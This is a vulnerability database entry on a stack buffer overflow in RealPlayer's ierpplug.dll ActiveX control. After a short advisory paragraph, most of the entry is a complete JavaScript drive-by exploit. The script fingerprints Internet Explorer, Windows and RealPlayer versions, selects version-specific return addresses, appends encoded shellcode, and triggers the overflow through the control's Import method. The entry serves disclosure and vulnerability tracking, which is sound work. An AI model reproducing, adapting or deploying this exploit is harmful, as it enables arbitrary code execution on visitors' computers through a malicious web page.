RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType
RealPlayer stack buffer overflow vulnerability in ierpplug.dll ActiveX Contro

                                                source: http://www.securityfocus.com/bid/26130/info

RealPlayer is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks of user-supplied input before copying it to an insufficiently sized memory buffer.

Attackers can exploit this issue to execute arbitrary code in the context of the application using the affected control (typically Internet Explorer). Successful attacks can compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. 

&#60;script language=&#34;javascript&#34;&#62;

eval(&#34;function RealExploit()

{

var user = navigator.userAgent.toLowerCase();

if(user.indexOf(&#34;msie 6&#34;)==-1&&user.indexOf(&#34;msie 7&#34;)==-1)

  return;

if(user.indexOf(&#34;nt 5.&#34;)==-1)

  return;

VulObject = &#34;IER&#34; + &#34;PCtl.I&#34; + &#34;ERP&#34; + &#34;Ctl.1&#34;;

try

{

  Real = new ActiveXObject(VulObject);

}catch(error)

{

  return;

}

RealVersion = Real.PlayerProperty(&#34;PRODUCTVERSION&#34;);

Padding = &#34;&#34;;

JmpOver = unescape(&#34;%75%06%74%04&#34;);

for(i=0;i&#60;32*148;i++)

  Padding += &#34;S&#34;;

 

 

if(RealVersion.indexOf(&#34;6.0.14.&#34;) == -1)

{

  if(navigator.userLanguage.toLowerCase() == &#34;zh-cn&#34;)

   ret = unescape(&#34;%7f%a5%60&#34;);

  else if(navigator.userLanguage.toLowerCase() == &#34;en-us&#34;)

   ret = unescape(&#34;%4f%71%a4%60&#34;);

  else

   return;

}

else if(RealVersion == &#34;6.0.14.544&#34;)

  ret = unescape(&#34;%63%11%08%60&#34;);

else if(RealVersion == &#34;6.0.14.550&#34;)

  ret = unescape(&#34;%63%11%04%60&#34;);

else if(RealVersion == &#34;6.0.14.552&#34;)

  ret = unescape(&#34;%79%31%01%60&#34;);

else if(RealVersion == &#34;6.0.14.543&#34;)

  ret = unescape(&#34;%79%31%09%60&#34;);

else if(RealVersion == &#34;6.0.14.536&#34;)

  ret = unescape(&#34;%51%11%70%63&#34;);

else

  return;

 

 

 

if(RealVersion.indexOf(&#34;6.0.10.&#34;) != -1)

{

  for(i=0;i&#60;4;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf(&#34;6.0.11.&#34;) != -1)

{

  for(i=0;i&#60;6;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf(&#34;6.0.12.&#34;) != -1)

{

  for(i=0;i&#60;9;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf(&#34;6.0.14.&#34;) != -1)

{

  for(i=0;i&#60;10;i++)

   Padding = Padding + JmpOver;

   Padding = Padding + ret;

}

 

AdjESP = &#34;LLLL\\XXXXXLD&#34;;

Shell = &#34;TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp&#34;;

PayLoad = Padding + AdjESP + Shell;

while(PayLoad.length &#60; 0x8000)

  PayLoad += &#34;YuanGe&#34;; // ?~??~-.=!

Real.Import(&#34;c:\\Program Files\\NetMeeting\\TestSnd.wav&#34;, PayLoad,&#34;&#34;, 0, 0);

}

RealExploit();&#34;)

&#60;/script&#62;
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1